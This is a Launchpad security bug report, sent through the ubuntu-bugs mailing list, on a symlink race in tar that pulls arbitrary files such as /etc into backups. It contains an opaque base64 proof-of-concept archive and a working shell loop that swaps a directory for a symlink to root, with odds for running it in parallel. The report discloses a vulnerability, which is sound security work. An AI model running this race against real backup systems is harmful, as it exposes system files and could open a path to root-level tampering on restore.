*** This bug is a security vulnerability ***
You have been subscribed to a public security bug by Marc Deslauriers
(mdeslaur):
Binary package hint: tar
Tar does not check modifications of path during backup (symlinks). A
local might use that to create arbitrary large backups or include
arbitrary files at any locations, he as write access to, e.g. include a
copy of real /etc at /home/[username]/root. The user would then need
some social engineering (or hoster's automated "restore my site" button)
to get the files restored to his home directory.
Tested on:
Description: Ubuntu 10.04 LTS
Release: 10.04
# apt-cache policy tar
tar:
Installed: 1.22-2
Candidate: 1.22-2
Version table:
*** 1.22-2 0
500 http://archive.ubuntu.com/ubuntu/ lucid/main Packages
100 /var/lib/dpkg/status
Base64 tar.bz2 of POC:
QlpoOTFBWSZTWSm2JAcAAUh/xMwwAgB7f/+fL2ffqv/v374QAAABAAhAAxzWSsQFIgUxTCnoT00m
1MyJtCeQjEHqBgAEeiDTBklPCRskyNJpoZGjBBpoDQNDIAGgaDjRkyMIxAMJoMAmg0DJk0ZMhhAY
SJJpqMo8hTZNMmU8jVDZTQGaZT9KaaBpp6NQZP1T8jv9nKcDwLIBJ0ECNGys1ryyCQTRiGgCDwD3
o+WX5g24/Nkq+LRjb7XAndAe72e2yuwXmpfUrpZCMzBlxAUCEATXovesr7aYkfTR4lJdRiwxmElQ
RxxLBWPugjxv8Nu2a8KQ2WJocRS+uVrPPMg1Mr8XPr5ktHgWbIQ5UxF6qu6Dsh1HnOhCkErs7f1g
Y7JyNmHjZhCiJJfeQCLwGQVGAa+KCzLxylXZgJ+sK9f7LhaSlwmyhYad86s+ZP2PVkPtNIteqAX0
n6++AkdEELo76Ypk8JOJEoKvhv7e703nfCr7osUr165LFgoQOkouvV5XWUU4z5+x9ZJORGEUSECM
dMRUq8vAgDIljwCKt45cxhcAbSeRBxAJeAS4cJ6SfarQ4WcUQf0VIuLDxOfejVd+B4iqRmbabktw
xZ/oTzigHWTGHCsaoYMzn9EvIXGKabBVvSETimpK5HbAbIN981yexbt7QWKuOUg/JYi1AQCCvjtH
JzFucGT8wUcjUwpmGU32NIkSCWAJycVDQVi0lFWVSyacCH3hCkPjjfSLkUuIx3JaTg2w2jfkhQNO
TDT5NKg6iqICcPf0FxZNjxM4unGzEGbThiHbcUmzdWkKsoWE9EKKoC4wcnOlYfvJBtfHYUQGJDRn
+Kd3t9yU7+SwWW3U9bxQOEbmiWrDiW5DG2xjDXzbshq+9aZmdMNplpwtPK0wuqJVo6ZHKWJRs5N5
IS5Dzo+XVxjuG0qxYM+mKkFfYSakhFBjOuLtFuDLmryHwRxW9nKYW0biwzItEi7Ph0W5UqF5DAOf
ZskGighYQH2U0hK9balJFLLi8OCo/3VF3RAbl2SEGBe6JPZNjHsiRzIxtcycYoMGXPNSKmVCqURB
o6ZypQSHKzCTRVhMy1pYOU/44GqjU8EgLep3q0YCeS0CdnFy38RAA/xdyRThQkCm2JAc
The attack can also be used without inotify, but chances per modified directory
vary. Still, this allows remote attacks on backup, e.g. from a shared computer
room machine, if e.g. home is mounted via NFS. The files included will then be
from the server where the backup tasks run, most likely the storage server
providing all NFS resources. The same should be possible via sftp access or
malicious servlets. I haven't checked the chances for remote attacks, permanent
local flips between show about 10-20% chance to win with following algorithm:
mkdir root
dd if=/dev/zero bs=1M count=50 "of=root/ "
mkdir root/etc
while true; do
sleep 1
mv root rootx
ln -s / root
sleep 1
rm root
mv rootx root
done
Since a malicious user might use e.g. 30 directories in parallel, it
will give him 1-(0.9^30) chance to win (more than 95%). The size of the
zero-byte file is important, it interferes with the tar delay (resulting
from disk speed, compression speed). There might be optimization
strategies with different file sizes, that give higher chances with
lower number of files (leave that to the mathematicians).
Some thoughts on that topic:
http://www.halfdog.net/Software/SymlinksAndSecurity.html
Things todo:
* I haven't checked if it is possible to interfere with the proc interface in
that way, e.g. to gain access to kernel memory or other information, although I
guess, that I should be possible with more subtle time-races, that allow to
change the permissions of the file in backup to arbitrary values also.
* I haven't checked, if the same issue is present during restore. If yes
(as I suspect), and restore is run with root privileges, arbitrary code
execution will follow, .e.g. by replacing any system files (e.g. use
backdoored /bin/sh) or modification of /proc interface.
** Affects: tar (Ubuntu)
Importance: Undecided
Status: Confirmed
--
Tar allows inclusion of arbitrary files in backup
https://bugs.launchpad.net/bugs/570050
You received this bug notification because you are a member of Ubuntu Bugs,
which is a direct subscriber.
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
